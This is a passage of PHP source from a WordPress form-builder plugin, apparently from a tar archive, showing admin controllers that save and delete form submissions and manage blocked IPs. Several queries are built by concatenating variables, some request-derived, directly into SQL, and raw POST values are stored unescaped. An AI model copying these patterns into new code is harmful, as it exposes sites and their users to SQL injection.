				    $value = (isset($_POST['wdform_'.$i.'_wd_editor'.$id]) ? $_POST['wdform_'.$i.'_wd_editor'.$id] : NULL);
				    break;
				}
				case "type_mark_map": {	
				    $long = (isset($_POST['wdform_'.$i."_long".$id]) ? $_POST['wdform_'.$i."_long".$id] : NULL);
				    $lat = (isset($_POST['wdform_'.$i."_lat".$id]) ? $_POST['wdform_'.$i."_lat".$id] : NULL);
					    if($long and $lat)
					        $value = $long . '***map***' . $lat;

					break;
				}
									
				case "type_date_fields": {
				    $day = (isset($_POST['wdform_'.$i."_day".$id]) ? $_POST['wdform_'.$i."_day".$id] : NULL);
				    $month = (isset($_POST['wdform_'.$i."_month".$id]) ? $_POST['wdform_'.$i."_month".$id] : NULL);
					$year = (isset($_POST['wdform_'.$i."_year".$id]) ? $_POST['wdform_'.$i."_year".$id] : NULL);
					    if($day or $month or $year)   
							$value = $day . '-' . $month . '-' . $year;
					break;
				}
				
				case "type_time": {
					$ss = (isset($_POST['wdform_'.$i."_ss".$id]) ? $_POST['wdform_'.$i."_ss".$id] : NULL);
					$hh = (isset($_POST['wdform_'.$i."_hh".$id]) ? $_POST['wdform_'.$i."_hh".$id] : NULL);
					$mm = (isset($_POST['wdform_'.$i."_mm".$id]) ? $_POST['wdform_'.$i."_mm".$id] : NULL);					
					
					if(isset($ss))
						$value = $hh .':'. $mm .':' . $ss;
					else 
						$value = $hh .':' . $mm;
						
					$am_pm = (isset($_POST['wdform_'.$i."_am_pm".$id]) ? $_POST['wdform_'.$i."_am_pm".$id] : NULL);
					if(isset($am_pm))
						$value = $value . ' ' . $am_pm;
						
					break;
				}
				
				case "type_phone": {
				    $first = (isset($_POST['wdform_'.$i."_element_first".$id]) ? $_POST['wdform_'.$i."_element_first".$id] : NULL);
					$last = (isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : NULL);
					    if($first or $last)
					        $value = $first . ' ' . $last;	
					
					break;
				}
	
				case "type_name": {
			
					$element_title = (isset($_POST['wdform_'.$i."_element_title".$id]) ? $_POST['wdform_'.$i."_element_title".$id] : NULL);
					$element_first = (isset($_POST['wdform_'.$i."_element_first".$id]) ? $_POST['wdform_'.$i."_element_first".$id] : NULL);
					$element_last = (isset($_POST['wdform_'.$i."_element_last".$id]) ? $_POST['wdform_'.$i."_element_last".$id] : NULL);
					$element_middle = (isset($_POST['wdform_'.$i."_element_middle".$id]) ? $_POST['wdform_'.$i."_element_middle".$id] : NULL);
					
					if(isset($element_title))
						$value = $element_title . '@@@' . $element_first . '@@@' . $element_last . '@@@' . $element_middle;
					else
						$value = $element_first . '@@@' . $element_last;
						
					break;
				}
	
				case "type_file_upload": {					
					break;
				}
				
				case 'type_address': {
					$value='*#*#*#';
					$element = (isset($_POST['wdform_'.$i."_street1".$id]) ? $_POST['wdform_'.$i."_street1".$id] : NULL);
					if($element) {
						$value = $element;
						break;
					}
					
					$element = (isset($_POST['wdform_'.$i."_street2".$id]) ? $_POST['wdform_'.$i."_street2".$id] : NULL); 
					if($element) {
						$value = $element;
						break;
					}
					
					$element = (isset($_POST['wdform_'.$i."_city".$id]) ? $_POST['wdform_'.$i."_city".$id] : NULL); 
					if(isset($element)) {
						$value = $element;
						break;
					}
					
					$element = (isset($_POST['wdform_'.$i."_state".$id]) ? $_POST['wdform_'.$i."_state".$id] : NULL);
					if(isset($element)) {
						$value = $element;
						break;
					}
					
					$element = (isset($_POST['wdform_'.$i."_postal".$id]) ? $_POST['wdform_'.$i."_postal".$id] : NULL);
					if(isset($element)) {
						$value = $element;
						break;
					}
					
					$element = (isset($_POST['wdform_'.$i."_country".$id]) ? $_POST['wdform_'.$i."_country".$id] : NULL);
					if(isset($element)) {
						$value = $element;
						break;
					}
					
					break;
				}
				
				case "type_hidden": {
					$value = (isset($_POST[$label_order_original[$key]]) ? $_POST[$label_order_original[$key]] : NULL); 
					break;
				}
				
				case "type_radio": {
					$element = (isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : NULL);
					if(isset($element)) {
						$value = $element;	
						break;
					}
					
					$value = (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL);
					break;
				}
				
				case "type_checkbox": {
					$start=-1;
					$value='';
					for($j=0; $j<100; $j++) {
					
						$element = (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL);
		
						if(isset($element)) {
							$start = $j;
							break;
						}
					}
						
					$other_element_id=-1;
					$is_other = (isset($_POST['wdform_'.$i."_allow_other".$id]) ? $_POST['wdform_'.$i."_allow_other".$id] : NULL);
					if($is_other == "yes") {
						$other_element_id = (isset($_POST['wdform_'.$i."_allow_other_num".$id]) ? $_POST['wdform_'.$i."_allow_other_num".$id] : NULL);
					}
					
					if($start!=-1) {
						for($j=$start; $j<100; $j++) {
							$element = (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL);
							if(isset($element))
							if($j == $other_element_id) {
								$value = $value . (isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : NULL) . '***br***';
							}
							else	
								$value = $value . (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL) . '***br***';
						}
					}
					
					break;
				}
				
				case "type_paypal_price": {		
					$value=0;
					if((isset($_POST['wdform_'.$i."_element_dollars".$id]) ? $_POST['wdform_'.$i."_element_dollars".$id] : NULL)) 
						$value = (isset($_POST['wdform_'.$i."_element_dollars".$id]) ? $_POST['wdform_'.$i."_element_dollars".$id] : NULL);
						
					$value = (int) preg_replace('/\D/', '', $value); 
					
					if((isset($_POST['wdform_'.$i."_element_cents".$id]) ? $_POST['wdform_'.$i."_element_cents".$id] : NULL))
						$value = $value . '.' . ( preg_replace('/\D/', '', (isset($_POST['wdform_'.$i."_element_cents".$id]) ? $_POST['wdform_'.$i."_element_cents".$id] : NULL)));
					
					
					$value = $value; 
					break;
				}			
				
				case "type_paypal_select": {	
		
					if((isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : NULL)) 
						$value = (isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : NULL) . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL) . $form_currency; 
					else
						$value = '';
					
					$element_quantity = (isset($_POST['wdform_'.$i."element_quantity".$id]) ? $_POST['wdform_'.$i."element_quantity".$id] : NULL);
					if(isset($element_quantity) && $value!='')
						$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : NULL) . ': ' . (isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL);
					
					
					for($k=0; $k<50; $k++) {
						$temp_val = (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL);
						if(isset($temp_val) && $value!='') {			
							$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_property_label".$id]) ? $_POST['wdform_'.$i."_element_property_label".$id] : NULL) . ': ' . (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL) . '***property***';
						}
					}
					
					break;
				}
				
				case "type_paypal_radio": { 
					
					if((isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : NULL)) 
						$value = (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL) . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL) . $form_currency;
					else
						$value=''; 

					
					$element_quantity = (isset($_POST['wdform_'.$i."element_quantity".$id]) ? $_POST['wdform_'.$i."element_quantity".$id] : NULL);
					if(isset($element_quantity) && $value!='') 
						$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : NULL) . ': ' . (isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL) . '***quantity***';
					

					for($k=0; $k<50; $k++) { 
						$temp_val = (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL);
						if(isset($temp_val) && $value!='') {			
							
							$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_property_label".$id]) ? $_POST['wdform_'.$i."_element_property_label".$id] : NULL) . ': ' . (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL) . '***property***';
						}
					}
				
					break;
				}

				case "type_paypal_shipping": {
					
					if((isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : NULL)) 
						$value = (isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : NULL) . ' : ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL) . $form_currency;
					else
						$value=''; 
					$value = (isset($_POST['wdform_'.$i."_element_label".$id]) ? $_POST['wdform_'.$i."_element_label".$id] : NULL) . ' - ' . (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL);
					
					$paypal['shipping'] = (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL);

					break;
				}

				case "type_paypal_checkbox": {
					$start=-1;
					$value='';
					for($j=0; $j<100; $j++) {
					
						$element = (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL);
		
						if(isset($element)) {
							$start=$j;
							break;
						}
					}
					
					$other_element_id = -1;
					$is_other = (isset($_POST['wdform_'.$i."_allow_other".$id]) ? $_POST['wdform_'.$i."_allow_other".$id] : NULL);
					if($is_other=="yes") {
						$other_element_id = (isset($_POST['wdform_'.$i."_allow_other_num".$id]) ? $_POST['wdform_'.$i."_allow_other_num".$id] : NULL);
					}
					
					if($start!=-1) {
						for($j=$start; $j<100; $j++) {
							$element = (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL);
							if(isset($element))
							if($j==$other_element_id) {
								$value = $value . (isset($_POST['wdform_'.$i."_other_input".$id]) ? $_POST['wdform_'.$i."_other_input".$id] : NULL) . '***br***'; 
								
							}
							else { 
							  
								$value = $value . (isset($_POST['wdform_'.$i."_element".$id.$j."_label"]) ? $_POST['wdform_'.$i."_element".$id.$j."_label"] : NULL) . ' - ' . ((isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL) == '' ? '0' : (isset($_POST['wdform_'.$i."_element".$id.$j]) ? $_POST['wdform_'.$i."_element".$id.$j] : NULL)) . $form_currency . '***br***';
							
							}
						}
						
						$element_quantity = (isset($_POST['wdform_'.$i."element_quantity".$id]) ? $_POST['wdform_'.$i."element_quantity".$id] : NULL);
						if(isset($element_quantity)) 
							$value .= (isset($_POST['wdform_'.$i."_element_quantity_label".$id]) ? $_POST['wdform_'.$i."_element_quantity_label".$id] : NULL) . ': '. (isset($_POST['wdform_'.$i."_element_quantity".$id]) ? $_POST['wdform_'.$i."_element_quantity".$id] : NULL) . '***quantity***';
						
						for($k=0; $k<50; $k++) { 
							$temp_val = (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL);
							if(isset($temp_val)) {								                             
							
								$value .= '***br***' . (isset($_POST['wdform_'.$i."_element_property_label".$id]) ? $_POST['wdform_'.$i."_element_property_label".$id] : NULL) . ': ' . (isset($_POST['wdform_'.$i."_property".$id.$k]) ? $_POST['wdform_'.$i."_property".$id.$k] : NULL) . '***property***';
							}
						}
						
					}
					
					
					break;
				}
				
				case "type_star_rating": { 
				
					if((isset($_POST['wdform_'.$i."_selected_star_amount".$id]) ? $_POST['wdform_'.$i."_selected_star_amount".$id] : NULL) == "")
					  $selected_star_amount = 0;   
					else {
					  $selected_star_amount = (isset($_POST['wdform_'.$i."_selected_star_amount".$id]) ? $_POST['wdform_'.$i."_selected_star_amount".$id] : NULL);
					}
					$value = $selected_star_amount . '/' . (isset($_POST['wdform_'.$i."_star_amount".$id]) ? $_POST['wdform_'.$i."_star_amount".$id] : NULL); 		 							
					break;
				}
			
				case "type_scale_rating": { 
																
					$value = (isset($_POST['wdform_'.$i."_scale_radio".$id]) ? $_POST['wdform_'.$i."_scale_radio".$id] : 0) . '/' .	(isset($_POST['wdform_'.$i."_scale_amount".$id]) ? $_POST['wdform_'.$i."_scale_amount".$id] : NULL);								
					break;
				}
				
				case "type_spinner": { 
					$value = (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL);		
				
					break;
				}
				
				case "type_slider": {
					$value = (isset($_POST['wdform_'.$i."_slider_value".$id]) ? $_POST['wdform_'.$i."_slider_value".$id] : NULL);		
				
					break;
				}
				case "type_range": { 
					$value = (isset($_POST['wdform_'.$i."_element".$id.'0']) ? $_POST['wdform_'.$i."_element".$id.'0'] : NULL) . '-' . (isset($_POST['wdform_'.$i."_element".$id.'1']) ? $_POST['wdform_'.$i."_element".$id.'1'] : NULL);	
				
					break;
				}
				case "type_grading": {
					$value ="";
					$items = explode(":",(isset($_POST['wdform_'.$i."_hidden_item".$id]) ? $_POST['wdform_'.$i."_hidden_item".$id] : NULL)); 
					for($k=0; $k<sizeof($items)-1; $k++)
					    $value .= (isset($_POST['wdform_'.$i."_element".$id.'_'.$k]) ? $_POST['wdform_'.$i."_element".$id.'_'.$k] : NULL) . ':';
						
					$value .= (isset($_POST['wdform_'.$i."_hidden_item".$id]) ? $_POST['wdform_'.$i."_hidden_item".$id] : NULL) . '***grading***';
			
					break;
				}
				
				case "type_matrix": {
				
					$rows_of_matrix = explode("***",(isset($_POST['wdform_'.$i."_hidden_row".$id]) ? $_POST['wdform_'.$i."_hidden_row".$id] : NULL)); 
					$rows_count = sizeof($rows_of_matrix)-1;
					$column_of_matrix = explode("***",(isset($_POST['wdform_'.$i."_hidden_column".$id]) ? $_POST['wdform_'.$i."_hidden_column".$id] : NULL));
					$columns_count = sizeof($column_of_matrix)-1;   
					                                           
				
					if((isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : NULL) == "radio") { 
						$input_value="";                         

						for($k=1; $k<=$rows_count; $k++)
						$input_value .= (isset($_POST['wdform_'.$i."_input_element".$id.$k]) ? $_POST['wdform_'.$i."_input_element".$id.$k] : 0) ."***"; 
						
					}
					if((isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : NULL) == "checkbox") { 
						$input_value="";
						
						for($k=1; $k<=$rows_count; $k++) 
						for($j=1; $j<=$columns_count; $j++)
						$input_value .= (isset($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j] : 0) . "***";
					}
					
					if((isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : NULL) == "text") { 
						$input_value="";
						for($k=1; $k<=$rows_count; $k++)
						for($j=1; $j<=$columns_count; $j++) 
						$input_value .= (isset($_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_input_element".$id.$k.'_'.$j] : NULL) . "***";
					}
					
					if((isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : NULL) == "select") { 
						$input_value="";
						for($k=1; $k<=$rows_count; $k++) 
						for($j=1; $j<=$columns_count; $j++)
						$input_value .= (isset($_POST['wdform_'.$i."_select_yes_no".$id.$k.'_'.$j]) ? $_POST['wdform_'.$i."_select_yes_no".$id.$k.'_'.$j] : NULL) . "***";	
					}
										                                                                                           					
					$value = $rows_count . (isset($_POST['wdform_'.$i."_hidden_row".$id]) ? $_POST['wdform_'.$i."_hidden_row".$id] : NULL) . '***' . $columns_count . (isset($_POST['wdform_'.$i."_hidden_column".$id]) ? $_POST['wdform_'.$i."_hidden_column".$id] : NULL) . '***' . (isset($_POST['wdform_'.$i."_input_type".$id]) ? $_POST['wdform_'.$i."_input_type".$id] : NULL) . '***' . $input_value . '***matrix***';	
				
					break;
				}
				
			}

			if($type == "type_address")
				if($value == '*#*#*#')
					continue;

	
			if($value) {
				$query = "SELECT id FROM " . $wpdb->prefix . "formmaker_submits WHERE group_id='" . $group_id . "' AND element_label='" . $i . "'";
				$result = $wpdb->get_var($query);
															
				if($result) {					
					$save = $wpdb->update($wpdb->prefix . "formmaker_submits", array(
					  'element_value' => stripslashes($value),
					), array(
					  'group_id' => $group_id,
					  'element_label' => $i
					), array(
					  '%s',
					), array(
					  '%d',
					  '%s'
					));															
				}
				else {
					
					$save = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
					  'form_id' => $form_id,
					  'element_label' => $i,
					  'element_value' => stripslashes($value),
					  'group_id' => $group_id,
					  'date' => $date,
					  'ip' => $ip
					 ), array(
						 '%d',
						 '%s',
						 '%s',
						 '%d',
						 '%s',
						 '%s'
						)
					);
					
					
				}
			}

	
			
		}
	}
	
    else {	
	
		foreach ($label_id as $key => $label_id_1) {
		  $element_value = (isset($_POST["submission_" . $label_id_1]) ? esc_html(stripslashes($_POST["submission_" . $label_id_1])) : " ");
		  if (isset($_POST["submission_" . $label_id_1])) {
			$query = "SELECT id FROM " . $wpdb->prefix . "formmaker_submits WHERE group_id='" . $id . "' AND element_label='" . $label_id_1 . "'";
			$result = $wpdb->get_var($query);
			if ($label_type[$key] == 'type_file_upload')
			  if ($element_value)
				$element_value = $element_value . "*@@url@@*";
			  if ($result) {
				$save = $wpdb->update($wpdb->prefix . "formmaker_submits", array(
				  'element_value' => stripslashes($element_value),
				), array(
				  'group_id' => $id,
				  'element_label' => $label_id_1
				), array(
				  '%s',
				), array(
				  '%d',
				  '%s'
				)); 
			  }
			  else {
				$save = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
				  'form_id' => $form_id,
				  'element_label' => $label_id_1,
				  'element_value' => stripslashes($element_value),
				  'group_id' => $id,
				  'date' => $date,
				  'ip' => $ip
				 ), array(
					 '%d',
					 '%s',
					 '%s',
					 '%d',
					 '%s',
					 '%s'
					)
				);
			  }
		  }
		  else {
			$element_value_ch = (isset($_POST["submission_" . $label_id_1 . '_0']) ? esc_html(stripslashes($_POST["submission_" . $label_id_1 . '_0'])) : " ");
			if (isset($_POST["submission_" . $label_id_1 . '_0'])) {
			  for ($z = 0; $z < 21; $z++) {
				$element_value_ch = $_POST["submission_" . $label_id_1 . '_' . $z];
				if (isset($element_value_ch))
				  $element_value = $element_value . $element_value_ch . '***br***';
				else
				  break;
			  }
			  $query = "SELECT id FROM " . $wpdb->prefix . "formmaker_submits WHERE group_id='" . $id . "' AND element_label='" . $label_id_1 . "'";
			  $result = $wpdb->get_var($query);
			  if ($result) {
				$query = "UPDATE " . $wpdb->prefix . "formmaker_submits SET `element_value`='" . stripslashes($element_value) . "' WHERE group_id='" . $id . "' AND element_label='" . $label_id_1 . "'";
				$save = $wpdb->update($wpdb->prefix . "formmaker_submits", array(
					'element_value' => stripslashes($element_value),
				), array(
				  'group_id' => $id,
				  'element_label' => $label_id_1
				), array(
				  '%s',
				), array(
				  '%d',
				  '%s'
				)); 
			  }
			  else {
				$query = "INSERT INTO " . $wpdb->prefix . "formmaker_submits (form_id, element_label, element_value, group_id, date, ip) VALUES('" . $form_id . "', '" . $label_id_1 . "', '" . stripslashes($element_value) . "','" . $id . "', '" . $date . "', '" . $ip . "')";
				$save = $wpdb->insert($wpdb->prefix . "formmaker_submits", array(
					'form_id' => $form_id,
					'element_label' => $label_id_1,
					'element_value' => stripslashes($element_value),
					'group_id' => $id,
					'date' => $date,
					'ip' => $ip
				  ), array(
					 '%d',
					 '%s',
					 '%s',
					 '%d',
					 '%s',
					 '%s'
					)
				);
			  }
			}
		  }
		}		
	}
    if ($save !== FALSE) {
      echo WDW_FMC_Library::message('Submission Succesfully Saved.', 'updated');
    }
    else {
      echo WDW_FMC_Library::message('Error. Please install plugin again.', 'error');
    }
  }
  
  public function delete($id) {
    global $wpdb;
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);	    
    $query = $wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id="%d"', $id);
    // $elements_col = $wpdb->get_col($wpdb->prepare('SELECT element_value FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id="%d"', $id));
    if ($wpdb->query($query)) {
      // foreach ($elements_col as $element_value) {
        // $destination = str_replace(site_url() . '/', '', $element_value);
        // $destination = str_replace('*@@url@@*', '', $destination);
        // if ($destination) {
          // $destination = ABSPATH . $destination;
          // if (file_exists($destination)) {
             // unlink($destination);
          // }
        // }
      // }
      echo WDW_FMC_Library::message('Item Succesfully Deleted.', 'updated');
    }
    else {
      echo WDW_FMC_Library::message('Error. Please install plugin again.', 'error');
    }    
    $this->display($form_id);
  }
  
  public function delete_all() {
    global $wpdb;
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? esc_html($_POST['form_id']) : 0);	
    $cid = ((isset($_POST['post']) && $_POST['post'] != '') ? $_POST['post'] : NULL); 
    if (count($cid)) {
	  array_walk($cid, create_function('&$value', '$value = (int)$value;')); 
      $cids = implode(',', $cid);
      $query = 'DELETE FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id IN ( ' . $cids . ' )';
      // $elements_col = $wpdb->get_col('SELECT element_value FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id IN ( ' . $cids . ' )');
      if ($wpdb->query($query)) {
        // foreach ($elements_col as $element_value) {
          // $destination = str_replace(site_url() . '/', '', $element_value);
          // $destination = str_replace('*@@url@@*', '', $destination);
          // if ($destination) {
            // $destination = ABSPATH . $destination;
            // if (file_exists($destination)) {
               // unlink($destination);
            // }
          // }
        // }
        echo WDW_FMC_Library::message('Items Succesfully Deleted.', 'updated');
      }
      else {
        echo WDW_FMC_Library::message('Error. Please install plugin again.', 'error');
      }
    }
    else {
      echo WDW_FMC_Library::message('You must select at least one item.', 'error');
    }
    $this->display($form_id);
  }

  public function block_ip() {
    global $wpdb;
    $flag = FALSE;
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);	
    $cid = ((isset($_POST['post']) && $_POST['post'] != '') ? $_POST['post'] : NULL); 
    if (count($cid)) {
	  array_walk($cid, create_function('&$value', '$value = (int)$value;'));
      $cids = implode(',', $cid);
      $query = 'SELECT * FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id IN ( '. $cids .' )';
      $rows = $wpdb->get_results($query);
			foreach ($rows as $row) {
				$ips = $wpdb->get_var($wpdb->prepare('SELECT ip FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE ip="%s"', $row->ip));
        $flag = TRUE;
				if (!$ips) {
          $save = $wpdb->insert($wpdb->prefix . 'formmaker_blocked', array(
            'ip' => $row->ip,
          ), array(
            '%s',
          ));
				}
			}
    }
    if ($flag) {
      echo WDW_FMC_Library::message('IPs Succesfully Blocked.', 'updated');
    }
    else {
      echo WDW_FMC_Library::message('You must select at least one item.', 'error');
    }
    $this->display($form_id);
  }

  public function unblock_ip() {
    global $wpdb;
    $flag = FALSE;
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);	
    $cid = ((isset($_POST['post']) && $_POST['post'] != '') ? $_POST['post'] : NULL); 
    if (count($cid)) {
	  array_walk($cid, create_function('&$value', '$value = (int)$value;')); 
      $cids = implode(',', $cid);
      $query = 'SELECT * FROM ' . $wpdb->prefix . 'formmaker_submits WHERE group_id IN ( '. $cids .' )';
      $rows = $wpdb->get_results($query);
			foreach ($rows as $row) {
        $flag = TRUE;
				$ips = $wpdb->get_var($wpdb->prepare('SELECT ip FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE ip="%s"', $row->ip));
				if ($ips) {
          $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE ip="%s"', $ips));
				}
			}
    }
    if ($flag) {
      echo WDW_FMC_Library::message('IPs Succesfully Unblocked.', 'updated');
    }
    else {
      echo WDW_FMC_Library::message('You must select at least one item.', 'error');
    }
    $this->display($form_id);
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerBlocked_ips_fmc.php000060400000013404152434416630016253 0ustar00<?php

class FMControllerBlocked_ips_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = WDW_FMC_Library::get('task');
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $message = WDW_FMC_Library::get('message');
    echo WDW_FMC_Library::message_id($message);
    if (method_exists($this, $task)) {
		check_admin_referer('nonce_fmc', 'nonce_fmc');
		$this->$task($id);
    }
    else {
      $this->display();
    }
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelBlocked_ips_fmc.php";
    $model = new FMModelBlocked_ips_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewBlocked_ips_fmc.php";
    $view = new FMViewBlocked_ips_fmc($model);
    $view->display();
  }

  public function save() {
    $message = $this->save_db();
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function save_db() {
    global $wpdb;
    $id = (isset($_POST['current_id']) ? (int) $_POST['current_id'] : 0);
    $ip = (isset($_POST['ip']) ? esc_html(stripslashes($_POST['ip'])) : '');
    if ($id != 0) {
      $save = $wpdb->update($wpdb->prefix . 'formmaker_blocked', array(
        'ip' => $ip,
      ), array('id' => $id));
    }
    else {
      $save = $wpdb->insert($wpdb->prefix . 'formmaker_blocked', array(
        'ip' => $ip,
      ), array(
				'%s',
      ));
    }
    if ($save !== FALSE) {
      $message = 1;
    }
    else {
      $message = 2;
    }
  }

  public function save_all() {
    global $wpdb;
    $flag = FALSE;
    $ips_id_col = $wpdb->get_col('SELECT id FROM ' . $wpdb->prefix . 'formmaker_blocked');
    foreach ($ips_id_col as $ip_id) {
      if (isset($_POST['ip' . $ip_id])) {
        $ip = esc_html(stripslashes($_POST['ip' . $ip_id]));
        if ($ip == '') {
          $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE id="%d"', $ip_id));
        }
        else {
          $flag = TRUE;
          $wpdb->update($wpdb->prefix . 'formmaker_blocked', array(
            'ip' => $ip,
          ), array('id' => $ip_id));
        }
      }
    }
    if ($flag) {
      $message = 1;
    }
    else {
      $message = 0;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function delete($id) {
    global $wpdb;
    $query = $wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE id="%d"', $id);
    if ($wpdb->query($query)) {
      $message = 3;
    }
    else {
      $message = 2;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }
  
  public function delete_all() {
    global $wpdb;
    $flag = FALSE;
    $ips_id_col = $wpdb->get_col('SELECT id FROM ' . $wpdb->prefix . 'formmaker_blocked');
    foreach ($ips_id_col as $ip_id) {
      if (isset($_POST['check_' . $ip_id])) {
        $flag = TRUE;
        $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_blocked WHERE id="%d"', $ip_id));
      }
    }
    if ($flag) {
      $message = 5;
    }
    else {
      $message = 2;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
